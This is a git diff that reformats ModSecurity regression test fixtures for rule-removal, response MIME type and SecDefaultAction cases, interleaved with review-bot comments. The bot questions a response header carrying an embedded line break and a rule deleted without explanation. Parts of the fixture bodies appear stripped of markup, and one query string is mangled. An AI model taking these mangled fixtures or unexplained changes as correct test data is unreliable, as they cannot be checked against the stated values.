\"id:2,pass,t:trim\"", 
@@ -82,40 +94,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 1 2-3", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-remove_by_msg.json b/test/test-cases/regression/config-remove_by_msg.json index 36cb3cab06..dc814e6be6 100644 --- a/test/test-cases/regression/config-remove_by_msg.json +++ b/test/test-cases/regression/config-remove_by_msg.json 
@@ -1,39 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByMsg (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByMsg (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by a SecRuleRemoveByMsg directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by a SecRuleRemoveByMsg directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByMsg tag123", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim,msg:'tag123'\"", 
@@ -41,40 +47,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByMsg (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByMsg (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Removed by a SecRuleRemoveByMsg directive." + "expected": { + "debug_log": "Skipped rule id '3'. Removed by a SecRuleRemoveByMsg directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByMsg whee", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-remove_by_tag.json b/test/test-cases/regression/config-remove_by_tag.json index 09681546ac..3ad907b735 100644 --- a/test/test-cases/regression/config-remove_by_tag.json +++ b/test/test-cases/regression/config-remove_by_tag.json 
@@ -1,39 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByTag (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByTag (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by a SecRuleRemoveByTag directive" + "expected": { + "debug_log": "Skipped rule id '2'. Removed by a SecRuleRemoveByTag directive", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByTag tag123", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim,tag:tag123\"", 
@@ -41,40 +47,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByTag (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByTag (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Removed by a SecRuleRemoveByTag directive." + "expected": { + "debug_log": "Skipped rule id '3'. Removed by a SecRuleRemoveByTag directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByTag whee", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-response_type.json b/test/test-cases/regression/config-response_type.json index 621ab38a20..bcea1effe1 100644 --- a/test/test-cases/regression/config-response_type.json +++ b/test/test-cases/regression/config-response_type.json 
@@ -1,128 +1,144 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"T \\(0\\) t:trim: \"no need.\"" + "expected": { + "debug_log": "T \\(0\\) t:trim: \"no need.\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType text\/plain text\/html text\/xml", + "SecResponseBodyMimeType text/plain text/html text/xml", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (2/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Response Content-Type is text/html. It is not marked to be inspected." + "expected": { + "debug_log": "Response Content-Type is text/html. 
It is not marked to be inspected.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType application\/something", + "SecResponseBodyMimeType application/something", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Response Content-Type is text/html. It is not marked to be inspected." + "expected": { + "debug_log": "Response Content-Type is text/html. It is not marked to be inspected.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType text\/plain text\/tml text\/xml", + "SecResponseBodyMimeType text/plain text/tml text/xml", "SecResponseBodyMimeTypesClear", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] } - - ] 
diff --git a/test/test-cases/regression/config-secdefaultaction.json b/test/test-cases/regression/config-secdefaultaction.json index bb3d7d8104..9a0ef824d8 100644 --- a/test/test-cases/regression/config-secdefaultaction.json +++ b/test/test-cases/regression/config-secdefaultaction.json 
@@ -1,57 +1,59 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: supporting transformation", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: supporting transformation", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; 
charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"lowercase: \"300\"", - "error_log":"" + "expected": { + "debug_log": "lowercase: \"300\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:lowercase,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", 
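Review bot: The response header `"Content-Type": "text/xml; charset=utf-8\n\r"` keeps a trailing LF/CR inside the value, while its sibling was cleaned from `"length\n\r"` to `"384"` in the same hunk. If the embedded line break is deliberate (a malformed-header input), the test title should say so; otherwise the value should become `"Content-Type": "text/xml; charset=utf-8"` so the fixture does not feed a header containing a line break into the engine by accident. The value 384 cannot be checked against the body as it is rendered on this page. The same header pair recurs in the hunks at -59,58 and -133,58.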
@@ -59,58 +61,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: supporting transformation + t:none", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: supporting transformation + t:none", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + 
"Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":" Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" ", - "error_log":"" + "expected": { + "debug_log": " Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:lowercase,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"t:none,phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", @@ -118,14 +122,41 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: t:none", - "expected":{ - "parser_error":"The transformation none is not suitable to be part of the SecDefaultActions" - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: t:none", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "The transformation none is not suitable to be part of the SecDefaultActions" + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:none\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"t:none,phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", 
@@ -133,58 +164,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: simple test", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: simple test", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + 
"Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", 
@@ -192,30 +225,83 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: action not suitable", - "expected":{ - "parser_error":"The action 'id' is not suitable to be part of the SecDefaultActions" - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: action not suitable", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "The action 'id' is not suitable to be part of the SecDefaultActions" + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,id:1,log,auditlog,pass,tag:'teste'\"", - "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste',t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: twice", - "expected":{ - "parser_error":"SecDefaultActions can only be placed once per phase and configuration context. Phase 2 was informed already." - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: twice", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "SecDefaultActions can only be placed once per phase and configuration context. Phase 2 was informed already." 
+ }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,pass,tag:'teste'\"", "SecDefaultAction \"phase:2,log,auditlog,pass,tag:'teste'\"", 
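Review bot: The "action not suitable" test loses its `SecRule REQUEST_HEADERS "@contains PHPSESSID" "id:1,tag:'teste',..."` line in what otherwise reads as a mechanical reformat, and nothing in the hunk explains why. The expected parser error comes from `id:1` inside `SecDefaultAction`, so the test presumably still passes, but a content change inside a formatting commit is easy to miss; either restore the rule or call out the removal in the commit message. Both parser-error tests here also gain `"http_code": 200` plus empty `client`/`server`/`request`/`response` objects. Since these cases are expected to stop at rule parsing, that status looks like a serializer default rather than something the test checks, and it would be clearer to omit it when `parser_error` is set. The `rules` array of the "twice" test continues past the end of the hunk.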
@@ -224,58 +310,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: status + redirect", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: status + redirect", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; 
